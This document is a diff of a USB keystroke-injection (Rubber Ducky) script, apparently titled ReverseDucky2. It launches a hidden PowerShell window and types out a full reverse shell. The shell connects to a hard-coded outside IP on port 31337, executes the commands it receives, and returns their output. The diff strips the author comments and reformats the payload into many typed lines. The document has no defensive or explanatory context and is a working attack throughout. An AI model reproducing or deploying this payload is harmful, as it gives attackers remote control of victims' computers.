test1

ducky2.txt

@@ -1,25 +1,34 @@
-REM       ReverseDucky2
-REM       Version 1.1
-REM       OS: Windows / Linux(?) (Not tested with Powershell on Linux)
-REM       Author: 0iphor13
-
-REM       Reverse shell executed in the background
-REM       Fill in Attacker-IP and Port in Line 19
-REM       DON'T FORGET TO START LISTENER
-
-
 DELAY 1500
 GUI r
 DELAY 500
-STRING powershell -NoP -NonI -W hidden
+STRING powershell -NoP -NonI -W Hidden -Command
 DELAY 250
 ENTER
-
 DELAY 200
-STRING $c=NewObject System.Net.Sockets.TCPClient("45.92.178.34", 31337);$s=$c.GetStream();[byte[]]$b=0..65535|%{0};while(($i=$
+
+STRING $client = New-Object System.Net.Sockets.TCPClient("45.92.178.34", 31337);
 DELAY 100
-STRING s.Read($b,0,$b.Length))-ne 0){;$d=(NewObject -TypeName System.Text.ASCIIEncoding).GetString($b,0,$i);$z=(ieX $d 2>&1|oU
+STRING $stream = $client.GetStream();
 DELAY 100
-STRING t-String);$x=$z+"RD "+(pwd)+"#";$y=([text.encoding]::ASCII).GetBytes($x);$s.Write($y,0,$y.Length);$s.Flush()};$c.Close()
+STRING [byte[]]$buffer = 0..65535|%{0};
+DELAY 100
+
+STRING while(($bytesRead = $stream.Read($buffer, 0, $buffer.Length)) -ne 0) {
+DELAY 100
+STRING $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($buffer,0, $bytesRead);
+DELAY 100
+STRING $sendback = (iex $data 2>&1 | Out-String );
+DELAY 100
+STRING $sendback2  = $sendback + "PS " + (pwd).Path + "> ";
+DELAY 100
+STRING $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
+DELAY 100
+STRING $stream.Write($sendbyte, 0, $sendbyte.Length);
+DELAY 100
+STRING $stream.Flush() 
+DELAY 100
+STRING }; 
+DELAY 100
+STRING $client.Close()
 DELAY 100
 ENTER